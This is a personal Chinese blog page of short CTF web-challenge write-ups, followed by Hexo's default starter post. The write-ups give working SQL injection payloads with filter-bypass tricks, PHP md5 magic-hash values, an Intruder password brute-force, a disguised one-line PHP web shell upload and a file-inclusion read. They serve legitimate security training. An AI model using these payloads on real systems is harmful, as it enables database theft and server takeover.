youbing的博客

这道题让我们用** GET传一个CTF值为Lit2023和让我们用POST传一个Challenge值为**** i’m_c0m1ng打开hackbar传入数据**

成功得到flag

注释时题目显示hacker!!black_list is /if|and|\s|#|–/i

这里用/**/代替空格,’闭合前面的’，)闭合前面的(，’闭合后面的’

查库名

‘union//select//(select/**/database())’

查到一个test

接着查表

‘//union//select//(select//group_concat(table_name)//from//information_schema.tables//where//table_schema=’test’)’

查到flag

flag中的字段名也叫flag

查询flag

‘//union//select//(select//group_concat(flag)//from//test.flag)’

得到flag

题目提示用一个不安全的方式传一个NSS上去

用get方式传上去又提示用安全的方法传一个NSS

再用POST传一个NSS上去，题目提示./getfile.php有我们想要的东西

这里告诉我们GET一个CTF和ATM然后flag在/f1ag里面，这里可以

让CTF=240610708，ATM=QNKCDZO这样它们值不相等但是md5值相等，POST一个NSS=/f1ag通过include拿到flag

先查order by列查到5的时候发现报错

-1’ union select 1,2,3,4 #确认一共有4列

-1’ union select group_concat(schema_name),2,3,4 from information_schema.schemata#

查库名

Flag大概率在ctf中直接对ctf进行查询

-1’ union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=’ctf’ #

发现flag进行查询

-1’ union select group_concat(column_name),2,3,4 from information_schema.columns where table_name=’flag’ #

得到id和data

-1’ union select group_concat(id,data),2,3,4 from flag#查询id和data得到flag

点击忘记密码提示账号为admin先登录一次用bp抓包

发送到Intruder中添加payload进行爆破发现admin123响应长度和其它密码不一样查看响应找到flag

将一句话木马后缀改成jpg,然后bp抓包将jpg后缀改成php

上传成功用蚁剑连接，在根目录中找到flag。

$_REQUEST[‘file’] 从GET或POST接收file参数然后直接拿来就用试了几次发现?File=/flag可以得到flag

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

hallo hexo

Quick Start

Create a new post

1

$ hexo new "My New Post"

More info: Writing

Run server

1

$ hexo server

More info: Server

Generate static files

1

$ hexo generate

More info: Generating

Deploy to remote sites

1

$ hexo deploy

More info: Deployment